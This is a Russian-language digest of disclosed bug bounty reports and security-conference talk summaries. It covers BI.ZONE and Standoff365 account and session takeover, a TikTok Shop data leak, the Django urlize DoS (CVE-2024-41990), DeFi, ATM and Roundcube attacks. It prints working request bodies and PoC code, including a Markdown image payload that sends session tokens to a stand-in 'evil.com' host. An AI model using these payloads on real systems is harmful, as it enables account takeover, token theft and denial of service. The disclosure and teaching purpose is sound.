Репорты простым языком

EH.SU скоро, а пока можно потестить репорты по ссылке https://reports2.zaheck.ru/reports/6 📷

🔥 Платформа Standoff365: новая программа Электронные сервисы Сахалинской области

https://bugbounty.standoff365.com/programs/sakhalin/

📹 Account takeover (demo.bugbounty.bi.zone)

💻 Тип уязвимости: Account Takeover
💰 Баунти: 100000 рублей
⚠️ Критичность: High
💥 CVSS: 9.1

Программа: BI.ZONE Bug Bounty
Исследователь: mr4nd3r50n
Статус: Полностью открытый отчёт
Видимость: Открытый
Дата: 17:55 31.08.2024
Обновление: 16:33 24.12.2024


📝 Краткое описание (Summary)

Уязвимость позволяет администратору программы на платформе https://demo.bugbounty.bi.zone менять важные данные (логин, почту, телефон, имя) любых пользователей. Это даёт возможность:

1. Угнать аккаунты багхантера (через восстановление аккаунта по новой почте злоумышленника).
2. Заблокировать доступ администратору к его собственной учётной записи (восстановление для админов отключено).

В результате злоумышленник получает доступ к приватным отчётам, перепискам и файлам жертвы, а та теряет возможность входа в аккаунт.

🔧 Технические детали

1. Роль администратора программы
- Администратор может управлять пользователями в своей программе, однако система неправильно проверяет права и позволяет редактировать любую учётную запись.

2. Изменение данных пользователя
- Отправляя PATCH`-запрос на `/api/users/<username>/, злоумышленник может указать новые логин, почту, телефон и имя жертвы.

3. Account Takeover
- После изменения e-mail на свой, злоумышленник активирует процедуру восстановления пароля.
- На его почту приходит письмо со ссылкой на сброс, и он получает полный доступ к аккаунту.

4. Блокировка учётной записи администратора
- Если изменить учётные данные другого админа, он лишается возможности входа, так как для админов программа не предусматривает восстановление доступа.

🚀 Шаги воспроизведения (Steps to Reproduce)

1. Авторизация в роли администратора программы (например, `paypal`).
2. Формирование PATCH-запроса к /api/users/hacker/:

PATCH /api/users/hacker/ HTTP/1.1
Host: demo.bugbounty.bi.zone
Cookie: csrftoken=fOvoDJjDwC2exyEQGnCo1BmOZQ4RpiWj; sessionid=pwmptheyjuz3pxv8n39bh60y8pwi7jos
Content-Type: application/json
X-Csrftoken: fOvoDJjDwC2exyEQGnCo1BmOZQ4RpiWj
X-Auth-Version: v2
X-Bug-Bounty: mr4nd3r50n

{
  "username": "hacker_hacked_mr4nd3r50n",
  "email": "[email protected]",
  "fullName": "Hacked by mr4nd3r50n",
  "phone": "+79999999998",
  "company": "paypal"
}

3. Успешная смена данных: почта и логин жертвы теперь принадлежат злоумышленнику.
4. Восстановление пароля через функцию «Forgot password», доступ к аккаунту получен.
5. Доступ к приватному контенту (отчёты, переписки, файлы).

💣 Опасность уязвимости

• Полный контроль над любым аккаунтом, в том числе возможна блокировка админов.
• Компрометация приватных данных: отчёты, вложения, переписка.
• Масштабность: любой администратор любой программы может атаковать любого пользователя.

❗ Почему это критично?

• Безграничные привилегии администратора программы: нет разграничения прав.
• Низкий порог эксплуатации: достаточно разлогинившегося или скомпрометированного админ-аккаунта.
• Серьёзные последствия: потеря контроля жертвой, кража данных, подрыв доверия к платформе.

🛡 Рекомендации

1. Реализовать корректную проверку прав (ACL), чтобы администратор мог редактировать только данные, связанные с его программой и только там, где ему это действительно разрешено.
2. Ограничить поля для редактирования (не позволять менять почту, логин, телефон без соответствующих подтверждений).
3. Двухфакторная аутентификация для важных действий.
4. Уведомлять владельца аккаунта о любых изменениях логина/почты.

✅ Итог

Обнаружена критическая уязвимость, позволяющая администратору программы угонять аккаунты (Account Takeover) на платформе demo.bugbounty.bi.zone. Вознаграждение составило 100000 рублей. Этот кейс показывает, насколько важно грамотно разграничивать права доступа и контролировать критичные операции по смене учётных данных.

#bugbounty #accounttakeover #BIzone #demo #security #AppSec

📱 Утечка данных неактивных/замороженных товаров TikTok

Общая информация

• Тип уязвимости: Business Logic Error
• Платформа: TikTok (конкретно — TikTok Shop Seller API)
• Описание: Использование параметра live в API-запросе позволяло извлечь данные о неактивных или приостановленных товарах.
• Баунти: $1 000
• Критичность: Средний уровень (Medium)

Данный баг был успешно обнаружен и задокументирован внешним исследователем с ником 696e746c6f6c. Он также предоставил подробное описание того, как именно была найдена уязвимость и каким образом её можно было эксплуатировать. Команда безопасности TikTok признала проблему, оперативно исправила и выплатила вознаграждение в размере 1000 долларов США.

Технические детали

1. Предыстория: функция “live”

Внутри TikTok Shop (системы для продажи товаров) существует возможность работать с различными статусами продуктов (активные, приостановленные, удалённые и т.д.). При реализации модуля, отвечающего за показ в прямых эфирах (live), в коде был найден блок:

onClick: function () {
  Fa('self-promotion', 'live', 'live_dashboard'),
  (0, de.xw)(m)
}

Функция Fa() принимает три аргумента: self-promotion, live и live_dashboard. Судя по контексту, именно эти значения указывают логику “прямого эфира” (live).

Однако было замечено, что параметр live может быть передан в API-запрос как булево значение (например, true или false). И при передаче этого параметра возможна некорректная фильтрация данных, возвращаемых сервером.

2. Суть уязвимости: доступ к неактивным/замороженным товарам

Исследователь обнаружил, что при формировании запроса к одному из внутренних эндпоинтов TikTok Shop (примерно POST https://*.tiktok.com/api/v1/xyz) можно подменять JSON-тело, указывая или опуская в нём поле live. Пример запроса:

const fetch = require('node-fetch');

const url = 'https://*.tiktok.com/api/v1/xyz';
const postData = {
  campaign_id: "0",
  product_name: "",
  page_index: 1,
  page_size: 30,
  live: false
};

const headers = {
  // ... необходимые заголовки ...
};

fetch(url, {
  method: 'POST',
  headers: headers,
  body: JSON.stringify(postData)
})
.then(response => {
  if (!response.ok) {
    throw new Error('error');
  }
  return response.json();
})
.then(data => {
  console.log(data);
})
.catch(error => {
  console.error('fetch error:', error);
});

При указании live: false либо вовсе отсутствии поля live в теле запроса сервер возвращал дополнительные данные, касающиеся товаров со статусом “неактивен” или “приостановлен” (suspended). Это не должно было происходить, так как такие товары не должны быть доступны из публичных или даже внутренних эндпоинтов для “live”-функционала.

Важно: Из стандартного поведения API ожидалось, что укажешь ли ты live: true или оставишь это поле пустым — сервер должен возвращать только актуальные (live) товары. Однако ошибка в бизнес-логике приводила к тому, что ложное (false) значение или отсутствие поля открывало доступ к приватным данным.

3. Пример получаемого ответа

Если не указывать параметр live, в ответе API могло прийти (упрощённо):

{
  "code": 0,
  "data": {
    "amount": null,
    "invited_amount": 0
  },
  "message": "success"
}

Но при точных условиях (например, передаче live: false) возвращались детальные данные о неактивных товарах, которые по задумке не должны были отображаться.

4. Потенциальные сценарии эксплуатации
• Утечка конфиденциальной информации
Злоумышленник мог получить сведения о неактивных или заблокированных товарах, включая их названия, ID, какие-то дополнительные поля. Для конкурентов или мошенников это потенциально ценные данные.
• Обход бизнес-логики
Вместо строгой фильтрации TikTok Shop, которая должна разделять товары по статусу, баг позволял “обойти” лимиты и просмотреть то, что скрыто от обычных пользователей.

При комбинировании с другими уязвимостями (например, поддельными запросами или инъекциями) полученные идентификаторы или информация могли стать основой для более серьёзных атак (возврат замороженных товаров в каталог, продажи под чужим товаром и т.д.).

Почему это критично
• Бизнес-риски: Утечка данных в контексте электронной коммерции бьёт по репутации, наносит возможный материальный ущерб.
• Нарушение политики приватности: Неактивные или заблокированные товары могут содержать чувствительные сведения (описания, цены, статистику и т.д.), которые не предназначены для общего доступа.
• Расширенный доступ к внутренним данным: Часто вместе со статусом товаров может утекать дополнительная служебная информация, которую злоумышленник сможет использовать.

Меры по исправлению
1. Изменение логики обработчика
• Проверять значение live строже. Если endpoint предназначен только для live-товаров, отклонять любые несанкционированные статусы (false, пустое поле и т.п.).
• Добавить полноценную проверку прав доступа и статусов продуктов (особенно если query-параметры/JSON могут влиять на выборку).
2. Аудит кода фронтенда и бэкенда
• Убедиться, что в клиентской части (JavaScript-файлы) не остаётся “дырок”, позволяющих формировать подобные запросы со скрытыми параметрами.
• Перепроверить бизнес-логику всей цепочки запросов (особенно, если есть аналоги Fa('something', 'live', ...)).
3. Дополнительная фильтрация на сервере
• Даже при получении нестандартных параметров с фронта сервер обязан фильтровать отдаваемые данные и возвращать только разрешённые для данного статуса.
4. Учёт состояния продуктов
• Строго разделять статусы: активный, в ожидании, заблокированный, архивный, и т.д. Нельзя смешивать их логику в одном эндпоинте без должной валидации.

Итоги и выводы
• Уязвимость была оперативно закрыта командой TikTok после уведомления.
• Исследователь получил заслуженное вознаграждение в размере 1 000 долларов.
• Данный случай демонстрирует, насколько критичны бизнес-логические ошибки в API, особенно когда речь идёт о торговых платформах с большим количеством пользователей и товаров.

Финальные рекомендации:
При разработке и аудитах систем, связанных с e-commerce, очень важно включать тестирование бизнес-логики в scope. Не всегда уязвимости ограничиваются XSS или SQL-инъекциями — нередко “простая” логическая ошибка даёт доступ к конфиденциальным данным или манипуляции с товарами, что может в итоге стоить компании финансовых потерь и урона репутации.

#tiktok #shop #bugbounty #data-leak #business-logic-errors

Кража сессии standoff365.com

💻 Тип уязвимости: Session Takeover
💰 Баунти: 450000 рублей
⚠️ Критичность: Критический

😟 В платформе Standoff 365 была обнаружена критическая уязвимость, связанная с подделкой сессии (session hijacking) из-за некорректной проверки источника изображений, вставленных через Markdown. Ошибка в регулярном выражении для проверки хоста позволяла злоумышленнику подставить ссылку на изображение со внешнего сервера, замаскировав его под адрес https://api.standoff365.com. В итоге, вместе с запросом на загрузку такого “изображения” к атакующему отправлялся заголовок авторизации (Authorization) с токеном сессии пользователя.

Подробное техническое объяснение

1. Описание функционала

В приложении есть Markdown-редактор, позволяющий вставлять изображения. Предполагалось, что можно отображать только изображения с собственного узла – https://api.standoff365.com.

2. Уязвимость в валидации хоста

Проверка адреса изображения осуществлялась через регулярное выражение. Задача была убедиться, что источник начинается с https://api.standoff365.com. Однако, проверка оказалась недостаточно строгой. В итоге URL вида:

https://api.standoff365.com.evil.com/image.png

мог пройти проверку, так как условие сводилось лишь к началу строки. Таким образом, злоумышленник мог указать собственный домен, добавив к нему префикс https://api.standoff365.com.

3. Поведение при загрузке изображений

Приложение само формировало HTTP-запрос к заданному источнику изображения и, помимо обычных заголовков, добавляло заголовок Authorization с сессионным токеном. Это критично, поскольку токен сессии – это “ключ” для доступа к учётной записи пользователя.

4. Сценарий эксплуатации

• Злоумышленник размещает в Markdown вредоносную ссылку на изображение, например:

![image](https://api.standoff365.com.evil.com/steal.png)

• Когда пользователь просматривает страницу, приложение пытается загрузить изображение, считая, что оно хостится у официального источника. В действительности запрос уходит на сервер злоумышленника.
• В заголовках запроса присутствует Authorization с токеном сессии жертвы.
• Получив этот токен, злоумышленник может использовать его для несанкционированного входа от лица жертвы.

5. Опасность уязвимости

• Компрометация сессии: Злоумышленник получает полный доступ к учётной записи жертвы.
• Кража данных: Доступ к приватной информации пользователя, возможность изменения данных, совершения действий в аккаунте.
• Широкие последствия: Любой пользователь, загрузивший страницу с подобным враждебным контентом, рискует потерять контроль над своей сессией.

Почему это критично?

• Непосредственная утечка токена авторизации к внешнему хосту.
• Возможность полного захвата учётной записи без необходимости знать логин или пароль.
• Потенциальное массовое воздействие на пользователей, просматривающих злонамеренно сконфигурированный контент.

Решения и рекомендации по устранению

• Строгая проверка хоста: Обновить регулярное выражение или полностью отказаться от данной логики в пользу более надёжного механизма проверки URL, чтобы разрешать загрузку только с чётко определённого домена.
• Изоляция авторизации: Пересмотреть необходимость отправки заголовка Authorization при загрузке статических ресурсов. Обычно токены не должны отправляться при запросах к изображениям.
• Защита по принципу “глубокой обороны”:
• Использовать белые списки (whitelist) доменов для загрузки ресурсов.
• Применять строгую Content Security Policy (CSP).
• Регулярно проводить аудит безопасности и пен-тесты функционала Markdown и связанных модулей.

Итог

Уязвимость была обнаружена и исправлена командой Standoff 365. Исследователю, нашедшему проблему (byq), было выплачено вознаграждение в размере 450 000 рублей. Серьёзность была повышена до критического уровня. Данный случай подчёркивает важность тщательной проверки входных данных и внимания к даже, казалось бы, незначительным функциональным нюансам, таким как проверка домена для загрузки изображений.

#багбаунти #markdown #bugbounty #Standoff365

CVE-2024-41990 в Django

💻 Тип уязвимости: DoS
💰 Баунти: $2162
⚠️ Критичность: Средняя

🤵‍♂ Описание проблемы

Исследователь выявил уязвимость в функциях urlize() и urlizetrunc() из модуля django.utils.html, которая может привести к замедлению работы или даже отказу в обслуживании (Denial-of-Service). Суть проблемы в том, что при обработке очень длинной пользовательской строки, содержащей повторяющиеся комбинации знаков .;, эти функции начинают работать всё медленнее по экспоненциальной зависимости от длины входных данных.

Как это работает

Представим, что ваше веб-приложение получает от пользователя большие объёмы текстовых данных (например, из POST-запроса или из базы данных), и вы используете urlize() для превращения текстовых ссылок в кликабельные гиперссылки. Если злоумышленник подготовит специально сформированную строку, вроде повторяющихся .;.;.;..., вызов urlize() при обработке этой строки может занять слишком много времени и ресурсов. Это может замедлить работу сервера или привести к ситуации, когда ресурс серверного времени будет исчерпан, и приложение перестанет отвечать корректно на запросы.

Пример (PoC)

Исследователь провёл тест с помощью кода на Python, постепенно увеличивая количество .; в строке. По мере роста длины строки (например, от 80 000 до более миллиона символов) время обработки стремительно увеличивалось - от долей секунды до десятков секунд. Это чётко указывает на возможность эффекта отказа в обслуживании.

import django.utils.html
from time import time

print('=== Тест urlize(".;" * n) ===')
for i in range(0, 1000000, 40000):
    start = time()
    PAYLOAD = ".;" * i
    django.utils.html.urlize(PAYLOAD)
    print(len(PAYLOAD), "\t", time() - start)

Результаты (примерные):

80 000 символов    ~0.52 секунд
160 000 символов   ~1.92 секунд
240 000 символов   ~4.27 секунд
320 000 символов   ~7.51 секунд
400 000 символов   ~11.77 секунд
...
960 000 символов   ~90+ секунд
1 040 000 символов ~106+ секунд

Возможные последствия (Impact)

• Значительное замедление работы приложения.
• Возможный отказ в обслуживании (DoS), если злоумышленник сможет подать в обработку очень длинные специально сформированные строки.

Статус уязвимости

• Уязвимость была выявлена и зарегистрирована под идентификатором CVE-2024-41990.
• Команда, ответственная за Django, выпустила исправление и обновление. Данный отчёт на платформе HackerOne имеет статус «Resolved», что означает, что проблема была устранена.

Рекомендации

• Обновить Django до версии, в которой проблема исправлена (следите за официальными патчами и релиз-нотами).
• При обработке пользовательских строк использовать ограничения по длине и/или проверять входные данные до вызова urlize().
• Использовать механизмы фильтрации и валидации пользовательского ввода, чтобы избежать передачи в urlize() чрезмерно больших строк.

Вывод

Эта уязвимость продемонстрировала, насколько важно внимательно относиться к функциям, обрабатывающим пользовательские данные. Даже относительно безобидные операции, такие как преобразование текста в ссылки, могут быть использованы злоумышленниками для создания серьёзной нагрузки на систему. Благодаря бдительности исследователей и своевременному реагированию разработчиков, уязвимость была устранена и теперь все пользователи Django могут избежать проблем с производительностью.

#Django #Security #CVE202441990 #DoS #PerformanceIssue #WebSecurity #BugBounty #OpenSource #PatchNow #SafeDevelopment

🔥 Александра Борисова — Как писать технические тексты и развивать сообщество

В своём докладе Александра Борисова, руководитель SMM-команды в компании BI.ZONE, поделилась практическими советами по написанию технических текстов и развитию сообществ. Она обратила внимание на важность умения писать понятные и интересные тексты, даже для тех, кто занимается техническими специальностями и не считает себя писателем.

Александра рассказала о том, как определить свою целевую аудиторию и какие вопросы стоит задать себе перед началом работы над текстом:

Что вы хотите сказать миру?
Зачем это вам и зачем это миру?
Где вы возьмёте контент?
Где будете писать и как продвигать?
Она подчеркнула значимость понимания задач читателя и предложила использовать матрицу полезного действия для планирования контента. В качестве примера Александра привела Telegram-канал "MEPhI CTF", посвящённый соревнованиям по информационной безопасности, и показала, как правильно подбирать контент для целевой аудитории.

В докладе были даны рекомендации по созданию хороших технических текстов:

Цените время читателя: пишите лаконично и по делу.
Смотрите на текст глазами читателя: учитывайте уровень подготовки и интересы аудитории.
Уважайте читателя: избегайте излишнего упрощения или, наоборот, сложных терминов без объяснения.
Следите за структурой текста: используйте заголовки, абзацы, списки для улучшения читабельности.
Не бойтесь, что всё уже написали до вас: уникальный взгляд и опыт всегда ценны.
Используйте правила вежливости: корректность и уважение к читателю повышают доверие.
Александра также поделилась полезными инструментами для работы с текстом, такими как сервисы "Главред" и "Инфостиль", которые помогают улучшить качество написанного. Она подчеркнула важность визуального оформления, использования примеров и поддержания баланса между текстом и графикой.

В заключение докладчица рассказала о том, как текст может помочь в развитии сообщества, приводя примеры из собственного опыта в компании BI.ZONE. Она ответила на вопросы аудитории о продвижении Telegram-каналов, работе с мемами, структурировании контента и поддержании интереса читателей.

Этот доклад будет особенно полезен для студентов, специалистов технических профессий и всех, кто хочет улучшить навыки написания текстов и эффективно развивать сообщества.

https://www.youtube.com/live/rXc0h-DExTw

#Кибербезопасность #ТехническоеПисьмо #SMM #РазвитиеСообществ #АлександраБорисова

🔥KazHackStan 2024 - Артём "Господин Собака" — Анализ экономических атак на криптопроекты

В своём докладе Артём, известный под никнеймом "Господин Собака" и являющийся триажером на баг-баунти платформе Immunefi, поделился глубоким пониманием того, как проводятся экономические атаки на криптопроекты. Immunefi — крупнейшая баг-баунти платформа для Web3 проектов, выплатила хакерам более 100 млн долларов, что делает её лидером в отрасли наряду с HackerOne.

Артём начал с объяснения основ смарт-контрактов для тех, кто не знаком с их работой. Он подробно рассказал о принципах экономических атак в DeFi (децентрализованных финансах), подчеркнув, что такие атаки отличаются от традиционных взломов Web2. Вместо кражи баз данных или получения административного доступа, злоумышленники используют финансовые инструменты и ошибки в коде смарт-контрактов для незаконного обогащения.

Докладчик обсудил процесс реверс-инжиниринга смарт-контрактов, когда исходный код недоступен, и представил инструменты, которые могут быть использованы для декомпиляции и анализа байт-кода. Он поделился практическими советами из своего опыта, включая использование таких ресурсов, как Etherscan, Dedaub и 4byte.directory для восстановления логики атак и понимания взаимодействий внутри блокчейна.

Артём также разобрал реальные примеры атак на DeFi проекты, такие как использование flashloan для взлома систем стейкинга и ошибки в математических вычислениях, позволяющие злоумышленникам получать непропорциональную прибыль. Он подчеркнул важность понимания временных проверок и механики блокчейна для предотвращения подобных уязвимостей.

В завершение, Артём ответил на вопросы аудитории, обсудил сложность автоматизации процессов анализа и поделился информацией о своих предстоящих воркшопах и мероприятиях в сообществе кибербезопасности.

Этот доклад будет особенно полезен для специалистов по блокчейн-безопасности, разработчиков смарт-контрактов и всех, кто интересуется защитой криптопроектов от экономических атак.

https://www.youtube.com/watch?v=KnywZQj_um0

#Кибербезопасность #DeFi #СмартКонтракты #Immunefi #Блокчейн

🔥KazHackStan 2024 - Юрий Ряднина - Vulnerabilities of banking systems

В своём докладе Юрий Ряднина (circuit), старший специалист по анализу защищённости банковских систем в Positive Technologies с более чем 10-летним опытом в информационной безопасности, поделился уникальными инсайтами о том, где и как скрываются уязвимости в банковских системах.

Юрий начал с обсуждения того, что уязвимости часто прячутся в самых неожиданных местах: внутренних сервисах, субдоменах и даже на наиболее видимых участках сайтов, которые часто игнорируются багхантерами. Он подчеркнул, что даже на главных страницах и в формах входа могут скрываться серьёзные дыры в безопасности.

Особое внимание было уделено уязвимостям типа XXE (XML External Entity) и уязвимостям бизнес-логики. Юрий подробно объяснил, как XXE-атаки могут быть использованы для чтения системных файлов или организации DoS-атак на серверы банков. Он также рассмотрел уязвимости бизнес-логики, подчёркивая их сложность обнаружения и потенциально критические последствия, такие как обход лимитов, накрутка баланса и манипуляции с курсами валют.

В практической части доклада Юрий продемонстрировал взлом условного электронного кошелька без использования сложных инструментов. Он показал, как можно эксплуатировать недостатки валидации данных, ошибки округления и другие простые, но опасные уязвимости. Например, он рассказал о способах превышения лимитов транзакций, обхода комиссий и даже создания кредитов под отрицательный процент.

Доклад завершился активной сессией вопросов и ответов. Юрий поделился советами для начинающих специалистов по кибербезопасности, обсудил важность взаимодействия между разработчиками и специалистами по безопасности, а также затронул роль нейронных сетей в современном багхантинге. Он подчеркнул, что хотя технологии продолжают развиваться, человеческий фактор и глубокое понимание систем остаются ключевыми в обеспечении безопасности.

Этот доклад будет особенно полезен для специалистов по информационной безопасности, разработчиков, банковских работников и всех, кто заинтересован в защите финансовых приложений от потенциальных угроз и атак.

https://www.youtube.com/watch?v=odm3kOvwHD0

#Кибербезопасность #БагХантинг #ИнформационнаяБезопасность #PositiveTechnologies

🎯🔍🛡 Server Side Request Forgery (SSRF) через аналитические отчёты (Ссылка на отчёт)

💻 Тип уязвимости: Server-Side Request Forgery (SSRF)
💰 Баунти: $25,000
⚠️ Критичность: Критическая

🔍 Анализ уязвимости
Этот отчёт выявляет уязвимость SSRF в аналитических отчётах Acronis Cloud Manager Admin Portal. Уязвимость позволяет злоумышленникам отправлять внутренние запросы с сервера приложения, что может привести к получению AWS-учетных данных и доступу к внутренним сервисам. Проблема возникла из-за недостаточной валидации пользовательского ввода при генерации PDF-отчётов, что позволило внедрить вредоносные теги.

В результате эксплуатации уязвимости злоумышленник мог получить доступ к конфиденциальным данным, манипулировать ресурсами AWS, выполнять произвольные команды и даже брать под контроль аккаунты. Acronis оперативно отреагировала на отчёт, внедрила исправления и добавила регрессионные тесты, чтобы предотвратить подобные инциденты в будущем.

Мы благодарим автора за своевременный отчёт и ответственное раскрытие уязвимости. Честно говоря, уже задолбалась объяснять такие отчёты, но они всё равно важны! 😅

#SSRF #Critical #Acronis

🔥 OFFZONE - Эксплуатация уязвимостей HTTP Request Splitting - Сергей Бобров

В этом докладе Сергей Бобров подробно рассказывает о давно известной уязвимости HTTP Header Injection (инъекция заголовков HTTP) и её эксплуатации в веб-серверах на базе Nginx. Он объясняет, почему данная уязвимость остаётся актуальной в 2023 году, несмотря на её длительное известие, и демонстрирует, как управляющие символы могут нарушить структуру текстовых протоколов, открывая путь к дополнительным проблемам безопасности.

Сергей приводит реальные примеры эксплуатации этой уязвимости на сервисах Яндекс и ВКонтакте, показывая, как неправильная конфигурация сервера может привести к утечке данных пользователей через манипуляции с запросами и ответами. Он обсуждает методы обнаружения подобных уязвимостей, включая использование ошибок парсинга запросов и нестандартных версий протокола, а также делится опытом работы с различными конфигурациями веб-серверов.

В завершение, Сергей предоставляет практические рекомендации по защите от HTTP Header Injection, такие как нормализация переменных URI, использование безопасных регулярных выражений и ограничения на использование управляющих символов. Видео нацелено на разработчиков, системных администраторов и специалистов по кибербезопасности, стремящихся повысить защиту своих веб-приложений и предотвратить потенциальные атаки.

https://www.youtube.com/watch?v=p1ClNhaoZQ8

#Кибербезопасность #HTTPInjection #Nginx #БезопасностьВеба #ЛабораторияКасперского

🔥DEF CON 32 - Самая темная сторона Bug Bounty - Jason Haddix

Джейсон Хаддикс, опытный специалист в области баг-баунти, представил доклад о проблемах и недостатках в индустрии охоты за уязвимостями. Он рассказал о своем опыте работы на всех сторонах экосистемы: как охотник за багами, как сотрудник платформы баг-баунти и как владелец программы.

Хаддикс выделил несколько ключевых проблем в индустрии. Во-первых, платформы баг-баунти используют данные об атаках и исследованиях хакеров для обучения ИИ и создания инструментов обнаружения уязвимостей, не предоставляя компенсацию исследователям. Во-вторых, компании, предоставляющие облачные WAF, мониторят трафик лучших охотников за багами, чтобы улучшить свои продукты, опять же без компенсации.

Докладчик также затронул проблемы, связанные с бюджетами программ и оценкой уязвимостей. Часто компании недооценивают необходимый бюджет для публичных программ, что приводит к занижению оценок уязвимостей или группировке багов для экономии средств. Хаддикс раскритиковал практику использования диапазонов выплат, отметив, что менее 15% клиентов когда-либо платят выше минимума указанного диапазона.

Особое внимание было уделено проблеме "звездности" в сообществе. Известные исследователи имеют преимущества в виде прямого доступа к руководству платформ и приоритетной поддержки, что создает неравные условия для новичков. Хаддикс также упомянул случаи кражи исследований внутренними триажерами платформ и подчеркнул необходимость высоких этических стандартов в индустрии.

В заключение Хаддикс предложил несколько советов для охотников за багами, включая тщательное описание воздействия уязвимости и стратегическое представление отчетов. Он подчеркнул, что платформы должны лучше ценить своих исследователей, так как они являются ключевым продуктом в экосистеме баг-баунти. Докладчик призвал к улучшению коммуникации между всеми участниками процесса и более прозрачной документации всех этапов работы с уязвимостями.

https://www.youtube.com/watch?v=6SNy0u6pYOc

Лукас Маккалоу, студент магистратуры по кибербезопасности и уголовному правосудию в Бостонском университете, представил доклад о физическом OSINT (Open Source Intelligence). Он определил OSINT как любую информацию из открытых источников в интернете, которую можно использовать без взлома или оплаты. Маккалоу рассказал о своем опыте работы с Trace Labs, организацией, использующей краудсорсинг для поиска пропавших людей, и упомянул Joe Gray как своего наставника в области OSINT.

Докладчик описал ряд инструментов, используемых в OSINT-расследованиях. Среди них Maltego - инструмент для визуализации связей между различными данными; WHOIS - для получения информации о владельцах доменов; Shodan - для поиска устройств, подключенных к интернету; и WiGLE - для информации о беспроводных сетях. Он также упомянул важность использования фреймворков и создания собственных рутин для OSINT-исследований.

Маккалоу подчеркнул важность Google Dorking для поиска специфической информации, такой как планы этажей или арендные договоры. Он продемонстрировал, как можно найти конфиденциальную информацию компаний, используя их адрес в поисковых запросах. Докладчик также представил новый инструмент GEOS spy AI, который может определить приблизительное местоположение по изображению.

В качестве примера применения OSINT Маккалоу рассказал о своем расследовании массажного салона. Он показал, как использовал Google-обзоры, изображения с Google Maps и данные WiGLE для сбора информации о планировке помещения, системах видеонаблюдения и беспроводных сетях объекта. Это демонстрирует, как много информации можно собрать, не посещая физически место расследования.

В заключение Маккалоу ответил на вопросы о переходе от онлайн-исследований к физическому наблюдению. Он подчеркнул важность социальной инженерии, например, использования поддельных удостоверений или маскировки под рабочего для получения физического доступа к объектам. Маккалоу также рассказал о своей работе с местными властями и волонтерскими организациями, в частности, в расследованиях, связанных с торговлей людьми во время Суперкубка.

https://www.youtube.com/watch?v=ksbFhXdF2EI

Пейю Ван, инженер по безопасности, представил доклад о хакинге децентрализованных приложений (dApps). Он выделил три типа dApps: без API (только смарт-контракты), с API (взаимодействие с бэкендом) и полномасштабные (сложная архитектура). Ван подчеркнул, что с развитием блокчейн-экосистемы dApps становятся все более сложными, часто интегрируя значительные компоненты Web2. Это приводит к появлению новых уязвимостей, особенно когда разработчикам не хватает знаний либо в области Web3, либо в области Web2 безопасности.

Докладчик описал различные виды атак на dApps. На клиентской стороне это могут быть вредоносные транзакции, кража подписей и фишинг. Серверная сторона уязвима для кражи приватных ключей, неправильной обработки транзакций и условий гонки. Ван отметил, что Web2 уязвимости в контексте Web3 приложений часто имеют более высокую критичность из-за прямого доступа к криптоактивам. Кроме того, он выделил уникальные для Web3 уязвимости, такие как злоупотребление газом, проблемы с валидацией адресов смарт-контрактов и ошибки в обработке токенов и NFT.

Ван привел несколько конкретных примеров уязвимостей в dApps. Один из случаев касался возможности истощения газа админского кошелька путем генерации случайных адресов и вызова API для их регистрации. Другой пример демонстрировал уязвимость, связанную с длительным временем обработки транзакций, что могло привести к атаке типа "отказ в обслуживании". Также была рассмотрена проблема условий гонки в игровом dApp, позволяющая пользователям тратить больше внутриигровой валюты, чем они имеют на балансе. Особое внимание было уделено уязвимостям в мостах между блокчейнами, где отсутствие проверки адреса смарт-контракта могло привести к краже средств.

Для обеспечения безопасности dApps Ван подчеркнул важность не только аудита смарт-контрактов, но и тщательного тестирования бэкенд-компонентов. Он отметил, что эксплуатация уязвимостей в бэкенде может быть менее заметной, чем атаки на смарт-контракты, но потенциально столь же опасной. Докладчик призвал разработчиков dApps уделять равное внимание безопасности как Web3, так и Web2 аспектов своих приложений.

В заключение Ван дал советы тем, кто хочет начать заниматься хакингом dApps. Он рекомендовал сначала хорошо освоить хакинг Web2 приложений, так как многие dApps содержат значительные Web2 компоненты. Затем следует изучить различные архитектуры dApps, поэкспериментировать с ними, вложив небольшую сумму в криптовалюту. Важно также понять основные концепции блокчейна и научиться читать смарт-контракты на Solidity. Ван подчеркнул, что хакинг dApps - это отличный способ для специалистов по Web2 безопасности войти в мир Web3, отметив при этом возможность получения значительных наград за обнаружение уязвимостей, которые могут достигать миллионов долларов.

https://www.youtube.com/watch?v=QipdGm6HffM

Мэтт Бёр, независимый исследователь безопасности, представил результаты своей работы по изучению уязвимостей в системе безопасности банкоматов Diebold Nixdorf Vynamic Security Suite. Эта система широко используется в финансовом секторе и казино США. Бёр обнаружил серию уязвимостей, позволяющих обойти предзагрузочную аутентификацию и получить несанкционированный доступ к системе банкомата.

Ключевой проблемой оказалось наличие незашифрованного раздела Linux на жестком диске банкомата. Это позволило исследователю манипулировать процессом загрузки и получать доступ к зашифрованному разделу Windows, где хранится основное ПО банкомата. Бёр продемонстрировал несколько методов эксплуатации, включая модификацию системных файлов и использование символических ссылок.

Исследователь обнаружил и эксплуатировал уязвимости в нескольких версиях Vynamic Security Suite, начиная с версии 18 и заканчивая версиями 4.0-4.3. Каждый раз, когда Diebold Nixdorf выпускала исправление, Бёр находил новый способ обойти защиту. Это указывает на рекурсивный характер уязвимостей и сложность их полного устранения без фундаментального изменения архитектуры системы.
Бёр подчеркнул, что для эксплуатации уязвимостей требуется физический доступ к банкомату. Тем не менее, он рекомендовал ряд мер по смягчению рисков, включая своевременное обновление ПО, включение дополнительных проверок безопасности, мониторинг физического доступа к верхней части банкомата и блокировку винтов жесткого диска.

В результате исследования Бёра компания Diebold Nixdorf начала работу над полным шифрованием операционной системы Linux в своих банкоматах. Новая версия 4.4, выпущенная в апреле 2023 года, должна устранить основную причину уязвимостей. Это демонстрирует важность независимых исследований безопасности для улучшения защиты критически важных финансовых систем.

https://www.youtube.com/watch?v=lF8NEsl3-kQ

⚠️💥📧 Новая атака на Roundcube Webmail через CVE-2024-37383

🕵️‍♂️ В статье описано, как злоумышленники используют уязвимость CVE-2024-37383 в Roundcube Webmail для атак на почтовые серверы. Roundcube — популярный веб-клиент для электронной почты с открытым исходным кодом, широко используемый в коммерческих и государственных организациях, что делает его привлекательной целью для атак.

Авторы подробно разбирают механизм эксплуатации уязвимости, связанной с некорректной обработкой SVG-элементов в письмах. Уязвимость позволяет злоумышленникам выполнять произвольный JavaScript-код в контексте пользователя, что может привести к краже учетных данных и переписки.

Важно отметить, что уязвимость была устранена в мае 2024 года, но многие организации до сих пор не обновили свои версии Roundcube. Это подчеркивает необходимость своевременного обновления ПО, особенно критически важного для безопасности.

